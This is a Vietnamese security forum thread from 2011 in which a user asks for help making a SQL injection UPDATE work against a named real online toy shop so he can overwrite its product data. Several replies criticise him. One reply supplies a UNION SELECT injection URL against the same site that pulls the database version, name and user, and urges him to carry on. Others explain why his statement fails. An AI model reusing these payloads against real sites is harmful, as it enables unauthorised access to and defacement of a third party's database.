banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Giúp em về câu lệnh SQL  XML
  [Question]   Giúp em về câu lệnh SQL 14/06/2011 10:14:00 (+0700) | #1 | 240710
xdvkxdvk
Member

[Minus]    0    [Plus]
Joined: 23/05/2007 10:13:58
Messages: 27
Offline
[Profile] [PM]
tình hình là em mò đc 1 trang dính lỗi SQL ịnection
đã mò ra tên chính xác 1 table với tên của 3 colum trong table đó
table: products gồm 10 colum nhưng em mới mò đc 3 colum thongtin,gia,trangthai
có 1 đièu lạ là khi sử dụng lệnh update lại không đc chấp nhận
li8nk khai thác
http://www.vuongquocdochoi.vn/home.php?act=product&kh=110614101345&mn=71&sub_id=273&id=607&product_id=607&cid=380 union all update products set thongtin='Site cua ban bi mac loi SQL injection' where gia=99000

anh chị có thể chỉ cho em câu lệnh trên có sai ở đâu không
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 16/06/2011 08:14:12 (+0700) | #2 | 241008
[Avatar]
yeucodon
Member

[Minus]    0    [Plus]
Joined: 22/03/2008 11:25:51
Messages: 39
Offline
[Profile] [PM]
bạn định làm gì với site này mà lại viết thế cậu lênh sai rồi nên đọc lại SQL đi mà cậu có thể email cho admin mà k nên dùng cách này ảnh hưởng đến công việc của người ta
sống trong đời sống, cần có một tấm lòng
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 16/06/2011 08:17:10 (+0700) | #3 | 241009
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Không hiểu sao lắm người thích SQL injection mà không biết SQL statement thế nào là đúng, thế nào là sai. Sao lúc nào cũng muốn đốt giai đoạn và tự tạo lỗ hổng lung tung rồi thắc mắc?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 20/06/2011 07:22:22 (+0700) | #4 | 241435
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]

conmale wrote:
Không hiểu sao lắm người thích SQL injection mà không biết SQL statement thế nào là đúng, thế nào là sai. Sao lúc nào cũng muốn đốt giai đoạn và tự tạo lỗ hổng lung tung rồi thắc mắc? 


Đơn giản là vì mọi người muốn làm "hắc-cờ" đấy anh conmale thay vì học SQL người ta toàn tìm hiểu về SQL ịnection, Thay vì tìm hiểu về mạng máy tính người ta tìm hiểu Denial Of Service. Thay vì học lập trình người ta tìm hiểu về virus máy tính. Kết quả là có nhiều người có kiến thức "chuyên môn" nhưng hơi thiếu "căn bản" smilie .
while(1){}
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 20/06/2011 08:14:35 (+0700) | #5 | 241440
xdvkxdvk
Member

[Minus]    0    [Plus]
Joined: 23/05/2007 10:13:58
Messages: 27
Offline
[Profile] [PM]

conmale wrote:
Không hiểu sao lắm người thích SQL injection mà không biết SQL statement thế nào là đúng, thế nào là sai. Sao lúc nào cũng muốn đốt giai đoạn và tự tạo lỗ hổng lung tung rồi thắc mắc? 


chào anh conmale. kiến thức thì newbie như em chưa thể bằng anh đc, ý em với vấn đề trên là, làm thế nào để chèn cái câu truy vấn update để thực thi đc. vì em đã thử nhiều cách nhưng vì database nó dùng là MySQL nên có thể trong kỹ thuật injection sẽ có khác biệt gì chăng ?

còn việc bạn kia nói mình "phá "thì cũng chưa đúng vì đơn giản mình đã công khai link web thì trước sau sẽ có người thông báo cho admin thôi. cái mình muốn là các bậc tiền bối chia sẻ kinh nghiệm cho newbie (ít ra là hướng đi thôi, hoặc chỉ cho tụi em cái sai) chứ trách newbie như tụi em làm gì.
đọc câu title của box này mà thấy hài
Thảo luận thâm nhập [ 100 viewing ]
"Dành cho các thảo luận liên quan đến thâm nhập. "

đồng ý là các newbie chưa có nhìêu kinh nghiệm thực tiễn, nên mới lên đây để xin các anh chị chia sẻ kinh nghiệm
nhưng như những người muốn tìm hiểu nó thì đọc và chỉ đọc thì có ích gì khi ko có hướng đi để thực hành những gì mình đã học smilie
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 20/06/2011 10:43:49 (+0700) | #6 | 241460
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
Việc cậu dùng SQL injection mà cậu được học và lôi thông tin từ database người ta ra công bố trên một forum đáng được tuyên dương smilie.
Code:
http://sqltutorials.blogspot.com/2007/06/sql-union-all.html
Có thời gian thì đọc.

UNION ALL để gộp tất cả các kết quả từ 2 bảng UPDATE thì không trả về kết quả nào >_<!. Vì đây là lỗi cú pháp (syntax error) nên MySQL không thực thi nó.
while(1){}
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 25/06/2011 21:14:36 (+0700) | #7 | 242108
vanganh16p
Member

[Minus]    0    [Plus]
Joined: 25/06/2011 06:37:36
Messages: 2
Offline
[Profile] [PM]
các anh ơi giúp em cái này cái :

em có 2 bảng A và B với 2 primary key tương ứng là a,b.

trong B có chứa a và trong A có chứa b ( các FK này có thể null).

Từ 1 value biết trước trong bảng A, có thể nào query tất cả dữ liệu của 2 bảng A,B liên quan với quan hệ ở trên ko?
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 26/06/2011 14:16:48 (+0700) | #8 | 242137
vanganh16p
Member

[Minus]    0    [Plus]
Joined: 25/06/2011 06:37:36
Messages: 2
Offline
[Profile] [PM]
hic ko ai biết à smilie(
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 30/06/2011 15:05:56 (+0700) | #9 | 242463
bula87
Member

[Minus]    0    [Plus]
Joined: 09/11/2007 18:56:38
Messages: 3
Offline
[Profile] [PM]
1 kinh nghiệm là khi khai thác link sql ban đầu không được thì nên kiếm 1 link khác thử xem sao...
ở đây mình chọn link này :

Code:
http://www.vuongquocdochoi.vn/home.php?act=mtc&mn=70


thông tin về site :

Code:
http://www.vuongquocdochoi.vn/home.php?act=mtc&mn=-70%20union%20select%201,concat_ws%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6--%20-


từ đây bạn làm tiếp nhé.

thanks all
[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 01/07/2011 01:57:35 (+0700) | #10 | 242513
[Avatar]
thuypv
Member

[Minus]    0    [Plus]
Joined: 11/06/2008 12:25:57
Messages: 64
Offline
[Profile] [PM]
@xdvkxdvk

Mình đọc câu lệnh của bạn mà mình cũng không hiểu gì luôn, hiểu được ý đồ của bạn, nhưng có lẽ bạn đang sai trong câu lệnh

Đầu tiên mình phân tích các cái sai của bạn nha (Mình không dành về MySQL và PHP lắm, nhưng mình sẽ mô tả bằng C# và SQL server)

Thứ 1: cái CID khi họ lấy về, theo mình nghĩ nó là dạng số, vì thế họ requet.querystring về, sẽ conver sang kiểu số thì 1 chuỗi dài rằng rặc đàng sau của bạn, nó không thoả mãn vì thế sẽ bị lỗi ngay

Thứ 2: đặt trường hợp nó là dạng chuỗi đi

khi đó câu lệnh có thể là

select * from abc where cid = '380 union all update products set thongtin='Site cua ban bi mac loi SQL injection' where gia=99000'

bạn xem đoạn mã trên sai rồi đúng không?

Thứ 3: đặt trường hợp sau 380 bạn cho thêm 1 dấu ' và giá trị cid vẫn là 1 chuỗi, thì đoạn lệnh sau sẽ như thế này

select * from abc where cid = '380' union all update products set thongtin='Site cua ban bi mac loi SQL injection' where gia=99000'

Thì câu lệnh này vẫn sai

Bạn thử khai thác thêm xem thế nào, bạn tìm 1 giá trị nào đó mà giá trị trả về sẽ là dạng chuỗi rồi thử xem thế nào





[Up] [Print Copy]
  [Question]   Giúp em về câu lệnh SQL 01/07/2011 02:03:23 (+0700) | #11 | 242514
[Avatar]
thuypv
Member

[Minus]    0    [Plus]
Joined: 11/06/2008 12:25:57
Messages: 64
Offline
[Profile] [PM]

vanganh16p wrote:
các anh ơi giúp em cái này cái :

em có 2 bảng A và B với 2 primary key tương ứng là a,b.

trong B có chứa a và trong A có chứa b ( các FK này có thể null).

Từ 1 value biết trước trong bảng A, có thể nào query tất cả dữ liệu của 2 bảng A,B liên quan với quan hệ ở trên ko? 


Chưa gặp 1 dạng thiết kế bảng rối rắm như thế này bao giờ, có thể nó dùng trong 1 trường hợp đặc biệt nào đó (đoạn bôi mầu đỏ)

Thường thì 1 bảng chính 1 bản phụ (Tức là trong A có chứa b, nhưng trong B sẽ ko có A)

Hoặc là sinh ra 1 bảng trung gian tức là 1 bảng AB trong bảng này có 2 trường a, b là khoá chính

bảng này sẽ quan hệ với 2 bảng ban đầu, tức là A quan hệ 1 nhiều với AB và B quan hệ 1 nhiều với AB

[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|